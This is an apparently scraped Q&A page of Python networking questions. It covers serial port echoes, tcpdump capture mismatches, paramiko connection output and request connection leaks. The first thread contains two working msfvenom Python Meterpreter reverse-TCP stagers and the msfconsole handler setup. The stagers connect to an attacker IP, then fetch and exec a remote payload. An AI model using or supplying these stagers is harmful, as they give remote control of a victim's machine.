Meterpreter not connecting back - Python - python

I have used msfvenom to create the following python payload:
import socket,struct
s=socket.socket(2,socket.SOCK_STREAM)
s.connect(('MY PUBLIC IP',3930))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
d+=s.recv(l-len(d))
exec(d,{'s':s})
I have then opened up msfconsole, and done the following:
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 192.168.0.186 (MY LOCAL IP)
set LPORT 3930
exploit
It begins the reverse TCP handler on 192.168.0.186:3930, and also starts the payload handler. However, when I run the script on another computer, the payload times out after waiting for about a minute, and msfconsole doesn't register anything. I have port forwarded 3930 on the router. What am I doing wrong here?

This is the code I would use for a reverse TCP on Unix systems, with the details you've provided. However, I stumbled upon your post after error searching, so this isn't 100% flawless. I've gotten it to work perfectly in the past, but just recently it's begun to lag. It'll run once on an internal system, but anything after that gives me the same error message you got. I also get the same message when doing this over the WAN, as opposed to LAN, however it doesn't run the first time around. What ISP do you have? It may be entirely dependent on that.
import socket,struct
s=socket.socket(2,1)
s.connect(('IP ADDRESS',3930))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
d+=s.recv(4096)
exec(d,{'s':s})

Related

i am sending commands through serial port in python but they are sent multiple times instead of one

i am sending some commands having particular response serially using com port..the commands are kept in a file..i am reading each command through the file line by line and sending it serially over the com port..but when i am seeing it from the receiver end using Magic Terminal(Software)..i found that each command is going multiple times..which i am sending only one time..i have made a code in pycharm..and in the console i am seeing that command is going only once but from the uart receiving end the story is something else..i am stuck with this problem..i have maintain the same baudrate and everything but not able to diagnose the issue..
github link for the code is: https://github.com/AkshatPant06/Akshat-Pant/blob/master/cmd%20list
def recvResponse():
ser.write(serial.to_bytes(intCmd))
time.sleep(1)
data_recv=ser.read(2)
return data_recv
this i have used to receive the 2 byte response..
There seems to be nothing wrong with your code. At least to the extent I could reproduce, it only sends the command once (I tried your function after setting up my serial port in loopback).
I cannot say for sure but it might be that the terminal you're using has two windows, one for input and another one for output and somehow you're getting confused with what is in and out of your port.
One easy way to deal with this kind of issue is to use a sniffer on your port. You can do that combining com0com and Termite on Windows, as I recently explained here.
As you can see there is only one window on this terminal, and after setting up the forwarding you'll everything that comes in and out of your port. That should make it easier to see what your code is writing and reading.
To give you a conventional scenario to apply the sniffer trick you can refer to the following screenshot:
In this case, we have two real serial ports on a computer. On the first (COM9) we are running a Modbus server (you can imagine it as a bunch of memory addresses, each of one storing a 16-bit number). On COM10 we have a client that is sending queries asking for the contents of the first 10 addresses (called registers using the Modbus terminology). In a general use case, we have those ports linked with a cable, so we know (theoretically) that the client on COM10 is sending a data frame asking for those ten registers and the server on COM9 is answering with the numbers stored on those registers. But we are only able to see the contents on the server (left side of the picture) and what the client is receiving (right). What we don't see is what is traveling on the bus (yeah, we know what it is, but we don't know exactly how the Modbus protocol looks like on the inside).
If we want to tap on the bus to see what is being sent and received on each side we can create a couple of virtual ports with com0com and a port forwarding connection with Termite, something like the following screenshot:
Now we have moved our Modbus server to one of the virtual serial ports (COM4 in this case). After installing com0com we got (by default, but you can change names or add more port pairs, of course) a pair of forwarded ports (COM4<-->COM5). Now, if we want to see what is circulating through the ports we open Termite (bottom-right side of the picture) and set up another port forwarding scheme, in this case from virtual port COM5 to the real port COM9.
Finally (and exactly the same as before we were sniffing), we have COM9 connected together with COM10 with a cable. But now we are able to see all data going to and fro on the bus (all those HEX values you see on Termite displayed with the green/blue font).
As you can see, this will offer something similar to what you can do with more professional tools.

How can there be differences in what my Computer sends and what my Router receives?

Since this is my first question, please excuse me if I did anything wrong, I'm happy to learn :)
I have tried to solve this for about 3 months but couldn't get it to work. I think the fault is mine, but the only thing clear to me is that something is wrong. However I've run out of ideas where this could be.
tl;dr:
I'm having trouble with my desktop and router appearing to capture different traffic, without anything between those two. I have rewritten my scripts several times but couldn't get it to work.
Here is my context:
In my bachelor thesis I'm interested in middlebox behaviour.
For this I have a setup in which I have one Ubuntu Server machine set up as a router using dnsmasq and the isc-dhcp-server and another machine running Ubuntu Desktop connected to the Server machines subnet over ethernet.
To test the middleboxes, I'm calling every on of the Alexa top sites (for testing purposes either the top 10 or top 100) using Firefox + Selenium with each middlebox and once without anything between the Desktop and Server(Router). At the same time I'm logging the requested domains using tcpdump on the desktop and on the server. However for my question, the middleboxes are not really important, they're only illustrating why I'm doing this.
To illustrate my setup I made this diagram(I'm not allowed to post images since I don't have enough reputation):
The Desktop is looping through the Alexa List, whereas the server is in an infinite loop, until it receives a quit message from the Desktop.
In the Desktops script there are timeouts (I've experimented with timeouts between 3s and 60s) between each step. It cycles through the Alexa List with websites.
Tcpdumps are named according to the current domain+middlebox/plain.
Afterwards another python script is loading the tcpdumps, cycles through dns packets and creates a dictionary with IP:Domain mapping. Then it creates a dictionary with each domain from the Alexa list as a key and the value containing a set of subsequently called domains. This is done for traffic captured on the server and traffic captured on the Desktop, however they both use the Desktops DNS Dictionary.
Finally I have a Script comparing the generated Dictionaries.
To verify the differences between Desktop and Server for middleboxes, I compare the Plain pages as well. However there are always differences between the domains captured on the desktop and on the server. Usually between 2 and 5 subcalls per alexa domain differing (Those are subcalls I would expect other Alexa Domains to call. For example wikipedia.org is probably not calling facebook.com, but facebook.com itself probably is. Facebook showing up as a subcall of wikipedia is what irritates me). From my understanding this shouldn't be the case. In the beginning I was using the Python Library PyShark, but because those problems were appearing I thought using tcpdump directly might do the trick.
I tried setting bigger timeouts, I tried capturing all traffic in a single file and I tried rewriting every line of code I thought could be erroneous.
There has to be an error somewhere, but I can't seem to find it. I know there is always some package loss, but especially when connected directly through ethernet I can't imagine it being this high.
I expect unexpected behavior from the combination between selenium/firefox and tcpdump. Latency in startup/closing down of those may be an issue, but I don't think this could be longer than 60s. I also expect the Ubuntu Desktop to send auto update requests and other system services while I'm running the test, but first I don't think they're doing that many requests and second I have my iptables set up to only allow tcp requests from the user that starts the python script.
Thank you so much for taking the time.
If you have any ideas/remarks where I could have gone wrong, I'd be grateful to hear it. If you have further questions, please don't hesitate to ask.
EDIT:(Clarification about what I'm trying to achieve)
My hypothesis is, that if I call a domain with my desktop computers browser and capture the network traffic on both the desktop and the router, both captures should contain the same packets.
If I have a middlebox which is blocking some of the domains and put it between the desktop computer and router, comparing the domains appearing in the captured traffic on the pc and on the router should yield exactly those domains, which the middlebox blocked.
My Problem:
Even without a middlebox, there is a difference in the captured traffic and I don't know where it is coming from.
Example (I made this one up, I'll post a real one once I'm back at uni):
Expected behavior:
wikipedia.org: {On PC but not on Router: [], On Router but not on PC: []}
facebook.com: {On PC but not on Router: [], On Router but not on PC: []}
Actual behavior:
wikipedia.org: {On PC but not on Router: [facebook.com], On Router but not on PC: []}
facebook.com: {On PC but not on Router: [], On Router but not on PC: []}

Paramiko get stdout from connection object (not exec_command)

I'm writing a script that uses paramiko to ssh onto several remote hosts and run a few checks. Some hosts are setup as fail-overs for others and I can't determine which is in use until I try to connect. Upon connecting to one of these 'inactive' hosts the host will inform me that you need to connect to another 'active' IP and then close the connection after n seconds. This appears to be written to the stdout of the SSH connection/session (i.e. it is not an SSH banner).
I've used paramiko quite a bit, but I'm at a loss as to how to get this output from the connection, exec_command will obviously give me stdout and stderr, but the host is outputting this immediately upon connection, and it doesn't accept any other incoming requests/messages. It just closes after n seconds.
I don't want to have to wait until the timeout to move onto the next host and I'd also like to verify that that's the reason for not being able to connect and run the checks, otherwise my script works as intended.
Any suggestions as to how I can capture this output, with or without paramiko, is greatly appreciated.
I figured out a way to get the data, it was pretty straight forward to be honest, albeit a little hackish. This might not work in other cases, especially if there is latency, but I could also be misunderstanding what's happening:
When the connection opens, the server spits out two messages, one saying it can't chdir to a particular directory, then a few milliseconds later it spits out another message stating that you need to connect to the other IP. If I send a command immediately after connecting (doesn't matter what command), exec_command will interpret this second message as the response. So for now I have a solution to my problem as I can check this string for a known message and change the flow of execution.
However, if what I describe is accurate, then this may not work in situations where there is too much latency and the 'test' command isn't sent before the server response has been received.
As far as I can tell (and I may be very wrong), there is currently no proper way to get the stdout stream immediately after opening the connection with paramiko. If someone knows a way, please let me know.

Python Requests Not Cleaning up Connections and Causing Port Overflow?

I'm doing something fairly outside of my comfort zone here, so hopefully I'm just doing something stupid.
I have an Amazon EC2 instance which I'm using to run a specialized database, which is controlled through a webapp inside of Tomcat that provides a REST API. On the same server, I'm running a Python script that uses the Requests library to make hundreds of thousands of simple queries to the database (I don't think it's possible to consolidate the queries, though I am going to try that next.)
The problem: after running the script for a bit, I suddenly get a broken pipe error on my SSH terminal. When I try to log back in with SSH, I keep getting "operation timed out" errors. So I can't even log back in to terminate the Python process and instead have to reboot the EC2 instance (which is a huge pain, especially since I'm using ephemeral storage)
My theory is that each time requests makes a REST call, it activates a pair of ports between Python and Tomcat, but that it never closes the ports when it's done. So python keeps trying to grab more and more ports and eventually either somehow grabs away and locks the SSH port (booting me off), or it just uses all the ports and that causes the network system to crap out somehow (as I said, I'm out of my depth.)
I also tried using httplib2, and was getting a similar problem.
Any ideas? If my port theory is correct, is there a way to force requests to surrender the port when it's done? Or otherwise is there at least a way to tell Ubuntu to keep the SSH port off-limits so that I can at least log back in and terminate the process?
Or is there some sort of best practice to using Python to make lots and lots of very simple REST calls?
Edit:
Solved...do:
s = requests.session()
s.config['keep_alive'] = False
Before making the request to force Requests to release connections when it's done.
My speculation:
https://github.com/kennethreitz/requests/blob/develop/requests/models.py#L539 sets conn to connectionpool.connection_from_url(url)
That leads to https://github.com/kennethreitz/requests/blob/develop/requests/packages/urllib3/connectionpool.py#L562, which leads to https://github.com/kennethreitz/requests/blob/develop/requests/packages/urllib3/connectionpool.py#L167.
This eventually leads to https://github.com/kennethreitz/requests/blob/develop/requests/packages/urllib3/connectionpool.py#L185:
def _new_conn(self):
"""
Return a fresh :class:`httplib.HTTPConnection`.
"""
self.num_connections += 1
log.info("Starting new HTTP connection (%d): %s" %
(self.num_connections, self.host))
return HTTPConnection(host=self.host, port=self.port)
I would suggest hooking a handler up to that logger, and listening for lines that match that one. That would let you see how many connections are being created.
Figured it out...Requests has a default 'Keep Alive' policy on connections which you have to explicitly override by doing
s = requests.session()
s.config['keep_alive'] = False
before you make a request.
From the doc:
"""
Keep-Alive
Excellent news — thanks to urllib3, keep-alive is 100% automatic within a session! Any requests that you make within a session will automatically reuse the appropriate connection!
Note that connections are only released back to the pool for reuse once all body data has been read; be sure to either set prefetch to True or read the content property of the Response object.
If you’d like to disable keep-alive, you can simply set the keep_alive configuration to False:
s = requests.session()
s.config['keep_alive'] = False
"""
There may be a subtle bug in Requests here because I WAS reading the .text and .content properties and it was still not releasing the connections. But explicitly passing 'keep alive' as false fixed the problem.

Python urllib2.urlopen bug: timeout error brings down my Internet connection?

I don't know if I'm doing something wrong, but I'm 100% sure it's the python script brings down my Internet connection.
I wrote a python script to scrape thousands of files header info, mainly for Content-Length to get the exact size of each file, using HEAD request.
Sample code:
class HeadRequest(urllib2.Request):
def get_method(self):
return "HEAD"
response = urllib2.urlopen(HeadRequest("http://www.google.com"))
print response.info()
The thing is after several hours running, the script starts to throw out urlopen error timed out, and my Internet connection is down from then on. And my Internet connection will always be back on immediately after I close that script. At the beginning I thought it might be the connection not stable, but after several times running, it turned out to be the scripts fault.
I don't know why, this should be considered as a bug, right? Or my ISP banned me for doing such things? (I already set the program to wait 10s each request)
BTW, I'm using VPN network, does it have something to do with this?
I'd guess that either your ISP or VPN provider is limiting you because of high-volume suspicious traffic, or your router or VPN tunnel is getting clogged up with half-open connections. Consumer internet is REALLY not intended for spider-type activities.
"the script starts to throw out urlopen error timed out"
We can't even begin to guess.
You need to gather data on your computer and include that data in your question.
Get another computer. Run your script. Is the other computer's internet access blocked also? Or does it still work?
If both computers are blocked, it's not your software, it's your provider. Update Your Question with this information, and how you got it.
If only the computer running the script is stopped, it's not your provider, it's your OS resources being exhausted. This is harder to diagnose because it could be memory, sockets or file descriptors. Usually its sockets.
You need to find some ifconfig/ipconfig diagnostic software for your operating system. You need to update your question to state exactly what operating system you're using. You need to use this diagnostic software to see how many open sockets are cluttering up your system.

Categories